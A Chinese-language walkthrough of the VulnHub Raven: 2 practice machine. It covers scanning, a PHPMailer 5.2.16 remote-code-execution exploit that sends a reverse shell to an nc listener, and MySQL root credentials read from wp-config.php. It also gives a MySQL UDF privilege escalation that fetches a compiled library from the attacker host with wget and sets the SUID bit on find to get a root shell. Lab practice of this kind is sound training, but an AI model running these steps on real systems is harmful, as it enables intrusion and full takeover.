一、準(zhǔn)備工作

kali和靶機(jī)都選擇NAT模式（kali與靶機(jī)同網(wǎng)段）

1.靶場環(huán)境

下載鏈接:Raven: 2 ~ VulnHub

2.kali的ip

命令:ifconfig

3.靶機(jī)的ip

掃描靶機(jī)ip

sudo arp-scan -l

二、信息收集

1.nmap的信息收集

（1）掃描靶機(jī)開放的端口及其服務(wù)

nmap -A 192.168.101.128

2.網(wǎng)站的信息收集

（1）靶機(jī)開放了80端口,先訪問靶機(jī)網(wǎng)站看看有什么有用的信息

訪問靶機(jī)網(wǎng)站,沒有發(fā)現(xiàn)什么信息

（2）dirb掃描靶機(jī)網(wǎng)站

dirb http://192.168.101.128

1)發(fā)現(xiàn)dirb掃描到的網(wǎng)站除了一個wordpress其他都是文件目錄，可能存在文件目錄瀏覽漏洞

2）對目錄文件進(jìn)行排查，在vendor目錄下的PATH文件里找到了第一個flag

3）在vendor目錄下的README.md里面看到了PHPMailer(一個功能齊全的PHP電子郵件創(chuàng)建和傳輸類)

4）在VERSION目錄文件中得知PHPMailer版本號為5.2.16

知識點(diǎn)：PHPMailer < 5.2.18版本存在安全漏洞，可使未經(jīng)身份驗(yàn)證的遠(yuǎn)程攻擊者在Web服務(wù)器用戶上下文中執(zhí)行任意代碼，遠(yuǎn)程控制目標(biāo)web應(yīng)用

三、漏洞發(fā)現(xiàn)及利用

（1）searchsploit命令搜索到可利用的漏洞

searchsploit PHPMailer

1）將相關(guān)的腳本文件拷貝

cp /usr/share/exploitdb/exploits/php/webapps/40974.py ./

2）修改腳本內(nèi)容

vim 40974.py

：wq

3）在攻擊機(jī)kali終端開啟監(jiān)聽端口4444

nc -lvvp 4444

4）運(yùn)行腳本

python 40974.py

如果報錯執(zhí)行下面的命令

pip install requests-toolbelt

編碼問題就在第一行腳本里面添加

#! /usr/bin/python3$

# -*- coding: utf-8 -*-$

如果兩個都不行嘗試一下下面的命令

python3 40974.py

我這里提示是說未聲明編碼，所以在腳本第一行添加

原來是我的python是python3

5）先訪問 http://192.168.101.128:80/contact.php，就會生成后門文件 shell1.php，再訪問 http://192.168.101.128/shell1.php，就成功反彈了一個shell到攻擊機(jī)上

6)看看kali那邊情況，成功監(jiān)聽

四、提權(quán)

1.優(yōu)化命令執(zhí)行終端，執(zhí)行下面命令進(jìn)入python交互式(注意要下載python環(huán)境才能運(yùn)行):

python -c 'import pty; pty.spawn("/bin/bash");'

2.尋找flag文件

find ./ -name flag*

3.查看剛才尋找到的flag2文件

cat /var/www/flag2.txt

4.flag3為圖片，網(wǎng)站下查看

http://192.168.101.128/wordpress/wp-content/uploads/2018/11/flag3.png

5. 查看mysql的config配置文件

cd /var/www/html/wordpress

ls -al

cat wp-config.php

6.發(fā)現(xiàn)了網(wǎng)站的mysql數(shù)據(jù)庫，數(shù)據(jù)庫的賬號密碼root：R@v3nSecurity

mysql -u root -pR@v3nSecurity

7.mysql

1）查看數(shù)據(jù)庫

show databases;

2）在kali終端查找腳本

searchsploit 1518.c

3）腳本下載到靶機(jī)

1.復(fù)制腳本

cp /usr/share/exploitdb/exploits/linux/local/1518.c .

2.gcc 編譯、運(yùn)行

gcc -g -shared -o x7.so 1518.c -lc

3.kali開啟http服務(wù)

python -m SimpleHTTPServer

4.靶機(jī)下載腳本

cd /tmp

wget http://192.168.101.10:8000/x7.so

ls

4）進(jìn)入數(shù)據(jù)庫創(chuàng)建數(shù)據(jù)表 foo，向表中插入二進(jìn)制數(shù)據(jù)，然后利用dumpfile函數(shù)把文件導(dǎo)出， 再新建存儲函數(shù)do_system類型是integer，別名（soname）文件名字

mysql -u root -pR@v3nSecurity

use mysql;

create table foo(line blob);

insert into foo values(load_file('/tmp/x7.so'));

select * from foo into dumpfile '/usr/lib/mysql/plugin/x7.so';

create function do_system returns integer soname 'x7.so';

select * from mysql.func;

5）通過do_system函數(shù)給find命令所有者的suid權(quán)限，使其可以執(zhí)行root權(quán)限的命令

select do_system('chmod u+s /usr/bin/find');

exit

8.提權(quán)

find / -exec "/bin/sh" \;

1)flag4

cd /root

cat flag4.txt

總結(jié)

以上是生活随笔為你收集整理的靶场练习第二十五天~vulnhub靶场之Raven-2的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。